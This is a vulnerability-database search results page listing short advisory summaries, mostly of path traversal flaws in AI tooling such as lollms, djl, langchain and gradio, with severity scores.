Lucene search
K

779 matches found

CNNVD
CNNVD
added 2024/06/27 12:0 a.m.4 views

Devika Security Breach

Stition Devika is an advanced AI software engineer at Stition USA that understands advanced human commands, breaks them down into steps, researches the relevant information, and writes code to achieve a given goal. Devika has a security vulnerability that stems from allowing external control over...

7.5CVSS7.1AI score0.02073EPSS
Exploits1References3
Veracode
Veracode
added 2024/06/12 5:26 a.m.21 views

Path Traversal

lollms is vulnerable to Path Traversal. The vulnerability is due to improper validation of file paths between Windows and Linux environments, allowing attackers to traverse beyond the intended directory and read any file on the Windows system...

7.5CVSS7AI score0.00881EPSS
Exploits1References2Affected Software1
Github Security Blog
Github Security Blog
added 2024/06/06 9:30 p.m.20 views

LoLLMS Path Traversal vulnerability

A path traversal vulnerability exists in the parisneo/lollms application, affecting version 9.4.0 and potentially earlier versions, but fixed in version 9.5.0. The vulnerability arises due to improper validation of file paths between Windows and Linux environments, allowing attackers to traverse...

7.5CVSS6.2AI score0.00881EPSS
Exploits1References4Affected Software1
Vulnrichment
Vulnrichment
added 2024/06/06 6:40 p.m.18 views

CVE-2024-1873 Path Traversal and Denial of Service in parisneo/lollms-webui

parisneo/lollms-webui is vulnerable to path traversal and denial of service attacks due to an exposed /selectdatabase endpoint in version a9d16b0. The endpoint improperly handles file paths, allowing attackers to specify absolute paths when interacting with the DiscussionsDB instance. This flaw...

8.2CVSS6.8AI score0.13389EPSS
Exploits0References1
Vulnrichment
Vulnrichment
added 2024/06/06 6:17 p.m.19 views

CVE-2024-4881 Path Traversal in parisneo/lollms

A path traversal vulnerability exists in the parisneo/lollms application, affecting version 9.4.0 and potentially earlier versions, but fixed in version 5.9.0. The vulnerability arises due to improper validation of file paths between Windows and Linux environments, allowing attackers to traverse...

7.5CVSS6.3AI score0.00881EPSS
Exploits1References2
CVE
CVE
added 2024/06/06 6:17 p.m.54 views

CVE-2024-4881

CVE-2024-4881 is a path traversal vulnerability in the parisneo/lollms application. Multiple connected documents confirm the issue affects version 9.4.0 and potentially earlier builds, arising from inadequate sanitization of file paths containing backslashes across Windows/Linux contexts, enablin...

7.5CVSS7.1AI score0.00881EPSS
Exploits1References2Affected Software1
NVD
NVD
added 2024/06/06 6:15 p.m.43 views

CVE-2024-2914

A TarSlip vulnerability exists in the deepjavalibrary/djl, affecting version 0.26.0 and fixed in version 0.27.0. This vulnerability allows an attacker to manipulate file paths within tar archives to overwrite arbitrary files on the target system. Exploitation of this vulnerability could lead to...

8.8CVSS0.00917EPSS
Exploits1References2
CVE
CVE
added 2024/06/06 6:8 p.m.63 views

CVE-2024-2362

The CVE-2024-2362 entry concerns parisneo/lollms-webui versión 9.3 on Windows, with a path traversal vulnerability in the del_preset endpoint due to inadequate input sanitization. The issue permits an attacker to delete files outside the intended directory by supplying absolute or traversal path...

9.1CVSS9.2AI score0.0115EPSS
Exploits1References1Affected Software1
CVE
CVE
added 2024/06/06 5:55 p.m.52 views

CVE-2024-2914

The CVE-2024-2914 TarSlip flaw affects the deepjavalibrary/djl project, with vulnerable version 0.26.0 and fixed in 0.27.0. Root cause: improper validation of tar entry file paths during extraction (as seen in files_util.py/extract_imagenet.py). Impact potential includes remote code execution, pr...

8.8CVSS8.1AI score0.00917EPSS
Exploits1References2Affected Software1
GithubExploit
GithubExploit
added 2024/06/05 3:37 p.m.390 views

Exploit for CVE-2024-4956

CVE-2024-4956 This repository contains a Python utility for a...

7.5CVSS7.6AI score0.18245EPSS
Exploits16
OSV
OSV
added 2024/06/04 9:51 a.m.22 views

BIT-NODE-2024-21890

The Node.js Permission Model does not clarify in the documentation that wildcards should be only used as the last character of a file path. For example: --allow-fs-read=/home/node/.ssh/.pub will ignore pub and give access to everything after .ssh/. This misleading documentation affects all users...

6.5CVSS6.9AI score0.00945EPSS
Exploits0References6
Tenable Nessus
Tenable Nessus
added 2024/06/03 12:0 a.m.21 views

RHEL 4 : wpa_supplicant (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 4 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - NetworkManager, wpasupplicant: Improper x509v3 certificate and key file paths sanitization CVE-2012-1096 Note that...

5.5CVSS6.3AI score0.0071EPSS
Exploits0References1
GithubExploit
GithubExploit
added 2024/05/31 1:11 p.m.406 views

Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Checkpoint Quantum_Spark_Firmware

Check Point Security Gateway RCE Exploit Tool CVE-2024-249...

8.6CVSS9.3AI score0.99978EPSS
Exploits52
Veracode
Veracode
added 2024/05/29 7:10 a.m.18 views

Path Traversal

org.openapitools, openapi-generator-online is vulnerable to a Path Traversal. The vulnerability is due to unrestricted access to the outputFolder option, which allows attackers to manipulate file paths and potentially read or delete files and folders outside of the intended directory...

8.3CVSS6.6AI score0.03592EPSS
Exploits0References4Affected Software1
Positive Technologies
Positive Technologies
added 2024/05/07 12:0 a.m.3 views

PT-2024-25515 · Logpoint · Logpoint

Name of the Vulnerable Software and Affected Versions: Logpoint versions prior to 7.4.0 Description: An issue was discovered that allows Local File Inclusion LFI when an arbitrary File Path is used within the File System Collector. The content of the file specified can be viewed in the incoming...

6.5CVSS7.2AI score0.00446EPSS
Exploits0References4
AlmaLinux
AlmaLinux
added 2024/04/30 12:0 a.m.47 views

Moderate: squashfs-tools security update

SquashFS is a highly compressed read-only file system for Linux. These packages contain the utilities for manipulating squashfs file systems. Security Fixes: squashfs-tools: unvalidated filepaths allow writing outside of destination CVE-2021-40153 squashfs-tools: possible Directory Traversal via...

8.1CVSS7AI score0.025EPSS
Exploits2References6
OSV
OSV
added 2024/04/26 9:30 a.m.16 views

GHSA-VX97-8Q8Q-QGQ5 Mattermost's detailed error messages reveal the full file path

Mattermost versions 9.6.x = 9.6.0, 9.5.x = 9.5.2, 9.4.x = 9.4.4 and 8.1.x = 8.1.11 fail to remove detailed error messages in API requests even if the developer mode is off which allows an attacker to get information about the server such as the full path were files are stored...

4.3CVSS4.3AI score0.00452EPSS
Exploits0References7
Github Security Blog
Github Security Blog
added 2024/04/16 12:30 a.m.22 views

langchain vulnerable to path traversal

langchain-ai/langchain is vulnerable to path traversal due to improper limitation of a pathname to a restricted directory 'Path Traversal' in its LocalFileStore functionality. An attacker can leverage this vulnerability to read or write files anywhere on the filesystem, potentially leading to...

8.8CVSS6.9AI score0.01856EPSS
Exploits1References4Affected Software1
CVE
CVE
added 2024/04/16 12:0 a.m.57 views

CVE-2024-1961

CVE-2024-1961 affects the open-source project vertaai/modeldb. The vulnerability is a path traversal flaw caused by improper sanitization of user-supplied file paths in the file upload flow, specifically in the NFSController.java and NFSService.java components. Attackers can manipulate the artifa...

8.8CVSS7.5AI score0.01034EPSS
Exploits0References1
Veracode
Veracode
added 2024/04/12 10:13 a.m.18 views

Local File Inclusion (LFI)

gradio is vulnerable to a Local File Inclusion. This vulnerability is due to improper validation of user-supplied input in the UploadButton component, specifically in the handling of file paths during file uploads to the /queue/join endpoint, which allows attackers to read arbitrary files on the...

7.5CVSS7AI score0.85393EPSS
Exploits2References3Affected Software1
Rows per page
Query Builder